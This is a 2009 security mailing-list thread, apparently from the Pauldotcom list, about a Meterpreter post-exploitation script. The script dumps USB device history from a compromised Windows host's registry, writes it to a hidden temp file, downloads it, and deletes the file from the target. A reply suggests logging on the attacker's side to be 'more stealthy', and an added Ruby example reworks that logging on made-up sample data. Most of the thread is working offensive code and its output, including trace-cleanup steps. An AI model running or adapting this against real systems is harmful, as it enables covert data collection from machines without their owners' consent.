save the data in the .msf3 log instead of writing it on the target; this
will make your script smaller and more stealthy. Here is the function I use
for this in my scripts:
# Function for writing data to a file (append mode, so repeated calls
# accumulate in the same log)
def filewrt(file2wrt, data2wrt)
  output = ::File.open(file2wrt, "a")
  data2wrt.each_line do |d|
    output.puts(d)
  end
  output.close
end
just give it the log file and the data like this:
log = "#{logs}\\installedusb.txt"
filewrt(log, message)
to create the message string variable do it like this:
message = ""
message << "========================================================================================================================\n"
message << "\tFriendly Name : #{friendlyName.data}\n"
message << "\t\t- Class : #{cl.data}\n"
message << "\t\t- DeviceDesc : #{deviceDesc.data}\n"
message << "\t\t- HardwareID : #{hardwareID.data}\n"
Iterate through each key, get the values, and close the key before going to the
next.
I hope this helps.
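As an added example (not code from either post), the reply's approach carried through on a constructed USBSTOR record: the message string is grown field by field with <<, the multi-string HardwareID is split on its separators, and the record is appended to installedusb.txt on the operator's side with filewrt instead of being echoed onto the target. The device key format Disk&Ven_X&Prod_Y&Rev_Z, the sample values, and the reading of the '?' characters in the posted output as rendered NUL separators are assumptions of this example.

```ruby
require 'fileutils'
# Constructed sample standing in for one USBSTOR\<device>\<instance> key:
# the key name plus the four values the posted script queries (values made up).
SAMPLE_DEVICES = [
  { key: 'Disk&Ven_Apple&Prod_iPod&Rev_1.62', instance: '000A2700ABCDEF&0',
    'FriendlyName' => 'Apple iPod USB Device', 'Class' => 'DiskDrive', 'DeviceDesc' => 'Disk drive',
    # REG_MULTI_SZ: NUL-separated entries; the posted log rendered those NULs as '?'
    'HardwareID' => "USBSTOR\\DiskApple___iPod____________1.62\0USBSTOR\\GenDisk\0GenDisk\0\0" },
]
# Split a REG_MULTI_SZ value into its entries ('?' accepted as a separator as well).
def split_multi_sz(raw)
  raw.split(/[\x00?]/).reject(&:empty?)
end
# Decode a USBSTOR device key name (Disk&Ven_X&Prod_Y&Rev_Z) into its fields.
def parse_usbstor_key(name)
  parts = name.split('&')
  fields = { type: parts.shift }
  parts.each do |p|
    k, v = p.split('_', 2)
    fields[k.downcase.to_sym] = v if v
  end
  fields
end
# Build the per-device record the way the reply suggests: one string grown with <<.
def format_device(dev)
  info = parse_usbstor_key(dev[:key])
  message = ''
  message << '=' * 72 << "\n"
  message << "\tFriendly Name : #{dev['FriendlyName']}\n"
  message << "\t\t- Class      : #{dev['Class']}\n"
  message << "\t\t- DeviceDesc : #{dev['DeviceDesc']}\n"
  message << "\t\t- Vendor/Product/Rev : #{info[:ven]} / #{info[:prod]} / #{info[:rev]}\n"
  message << "\t\t- Instance (serial)  : #{dev[:instance]}\n"
  split_multi_sz(dev['HardwareID']).each { |hw| message << "\t\t- HardwareID : #{hw}\n" }
  message
end
# The reply's filewrt: append to the log on the operator's own host, not the target.
def filewrt(file2wrt, data2wrt)
  ::FileUtils.mkdir_p(::File.dirname(file2wrt))
  ::File.open(file2wrt, 'a') { |output| data2wrt.each_line { |d| output.puts(d) } }
end

# Write every device record to <logs>/installedusb.txt and return that path.
def dump_usb_history(logs, devices = SAMPLE_DEVICES)
  log = ::File.join(logs, 'installedusb.txt')
  devices.each { |dev| filewrt(log, format_device(dev)) }
  log
end
```

Inside a Meterpreter script the hash would be filled from rk.query_value(...).data for each instance key, with rk.close called before moving to the next one.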
On Fri, Aug 14, 2009 at 4:47 PM, Dimitrios Kapsalis <[email protected]> wrote:
> Here is a meterpreter script to pull the USB devices from the registry.
>
> A few issues in saving the output to a text file on the target before
> downloading it. I think it's the \n that I'm adding. If anyone has any tips I'm
> all ears.
>
> As well the output on the meterpreter screen will be
>
> run installedusb
> [*] New session on 192.168.0.50:43304...
> [*] -- Files saved to C:\Documents and Settings\user\Application
> Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964...
> [*] -- Data logged to C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
> [*] Dumping software installed on pc per registry
> HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR...
> [*]
> ========================================================================================================================
> * Friendly Name : Apple iPod USB Device
> - Class : DiskDrive
> - DeviceDesc : Disk drive
> - HardwareID :
> USBSTOR\DiskApple___iPod____________1.62?USBSTOR\DiskApple___iPod____________?USBSTOR\DiskApple___?USBSTOR\Apple___iPod____________1?Apple___iPod____________1?USBSTOR\GenDisk?GenDisk??
>
> [*] -- Downloading C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
> [*] -- C:\Documents and Settings\user\Application
> Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964\installedusb.txt
> downloaded!
> [*] ...Done!!
> [*] Completed processing on 192.168.0.50:43304...
>
>
> [code]
> #
> # This is a Meterpreter script designed to be used by the Metasploit Framework
> #
> # Meterpreter script for pulling forensics data from registry for any USB device
> # connected to system
> #
> # Provided by Dimitrios Kapsalis
> # Version: 0.1
>
> require 'fileutils'
>
> # ===========================================================================
> # Print message to file on target
> # ===========================================================================
> def m_writetofile(session, file, message)
>   cmd = "cmd /c echo #{message} >> #{file}"
>   m_exec(session, cmd)
> end
>
> # ===========================================================================
> # Delete a file (meterpreter has no unlink API yet)
> # ===========================================================================
> def m_unlink(session, path)
>   r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => true})
>   # Wait for the command to finish before closing the process handle
>   while(r.name)
>     select(nil, nil, nil, 0.10)
>   end
>   r.close
> end
>
> # ===========================================================================
> # Exec a command and return the results
> # ===========================================================================
> def m_exec(session, cmd)
>   begin
>     r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
>     b = ""
>     # Read the channelized output until the process closes it
>     while(d = r.channel.read)
>       b << d
>     end
>     r.channel.close
>     r.close
>     b
>   rescue ::Exception => e
>     print_status("Error Running Command #{cmd}: #{e.class} #{e}")
>   end
> end
>
> # ===========================================================================
> # Function to upload files
> # ===========================================================================
> def m_upload(session, file)
>   location = session.fs.file.expand_path("%temp%")
>   fileontrgt = "#{location}\\#{rand(100)}.exe"
>   print_status("\t-- Uploading #{file}....")
>   session.fs.file.upload_file("#{fileontrgt}", "#{file}")
>   print_status("\t-- #{file} uploaded!")
>   print_status("\t-- File on target #{fileontrgt}")
>   return fileontrgt
> end
>
> # ===========================================================================
> # Function to download files
> # ===========================================================================
> def m_download(session, src, dst)
>   print_status("\t-- Downloading #{src}....")
>   session.fs.file.download_file("#{dst}", "#{src}")
>   print_status("\t-- #{dst} downloaded!")
> end
>
> # ===========================================================================
> # Script proper
> # ===========================================================================
>
> # The 'client' object holds the Meterpreter session
> # Aliasing here for plugin compatibility
> session = client
>
> script_name = "installedsoftware"
>
> # Extract the host and port
> host, port = session.tunnel_peer.split(':')
>
> print_status("New session on #{host}:#{port}...")
>
> # Create a directory for the logs
> logs = ::File.join(Msf::Config.config_directory, 'logs', script_name,
>                    host + "_" + Time.now.strftime("%Y%m%d.%M%S") + sprintf("%.5d", rand(100000)))
>
> # Create the log directory
> ::FileUtils.mkdir_p(logs)
>
> print_status("-- Files saved to #{logs}...")
>
> # Temporary output file on the target, downloaded and deleted at the end
> location = session.fs.file.expand_path("%temp%")
> filename = "#{rand(100)}.dat"
> fileontrgt = "#{location}\\#{filename}"
> print_status("-- Data logged to #{fileontrgt}....")
>
> begin
>   # =========================================================================
>   # Pull USB history: dump USB device history
>   # =========================================================================
>   key = "HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR"
>   root_key, base_key = session.sys.registry.splitkey(key)
>
>   message = "---------------------------------------------------------------------"
>   m_writetofile(session, fileontrgt, message)
>   message = "Dumping software installed on pc per registry #{key}... "
>   print_status(message)
>   m_writetofile(session, fileontrgt, message)
>   message = "---------------------------------------------------------------------"
>   m_writetofile(session, fileontrgt, message)
>
>   # Walk each device key under USBSTOR and each instance key beneath it
>   session.sys.registry.create_key(root_key, base_key).each_key() do |device|
>     puts device
>
>     session.sys.registry.create_key(root_key, "#{base_key}\\#{device}").each_key() do |intermediate|
>       puts intermediate
>
>       # Read the identifying values of this instance
>       rk = session.sys.registry.open_key(root_key, "#{base_key}\\#{device}\\#{intermediate}", KEY_READ)
>       cl = rk.query_value("class")
>       deviceDesc = rk.query_value("DeviceDesc")
>       friendlyName = rk.query_value("FriendlyName")
>       hardwareID = rk.query_value("HardwareID")
>       message = "\n========================================================================================================================\n" <<
>                 " * Friendly Name : #{friendlyName.data}\n" <<
>                 "     - Class : #{cl.data}\n" <<
>                 "     - DeviceDesc : #{deviceDesc.data}\n" <<
>                 "     - HardwareID : #{hardwareID.data}\n"
>
>       print_status(message)
>       m_writetofile(session, fileontrgt, message)
>     end
>   end
>
>   # =========================================================================
>   # download output file
>   # =========================================================================
>   m_download(session, fileontrgt, "#{logs}\\installedusb.txt")
>
>   sleep(3)
>
>   # =========================================================================
>   # delete the output file from the target system
>   # =========================================================================
>   m_unlink(session, fileontrgt)
>   print_status("...Done!!")
>
> rescue ::Exception => e
>   print_status("Exception: #{e.class} #{e} #{e.backtrace}")
> end
>
> print_status("Completed processing on #{host}:#{port}...")
> [/code]
>
> On Fri, Aug 14, 2009 at 12:57 PM, Dave Hull <[email protected]> wrote:
>
>> The user assist keys are ROT13 encoded!
>>
>> There's just so much good stuff. Volume shadow copies and restore
>> points too. And the list goes on...
>> _______________________________________________
>> Pauldotcom mailing list
>> [email protected]
>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>> Main Web Site: http://pauldotcom.com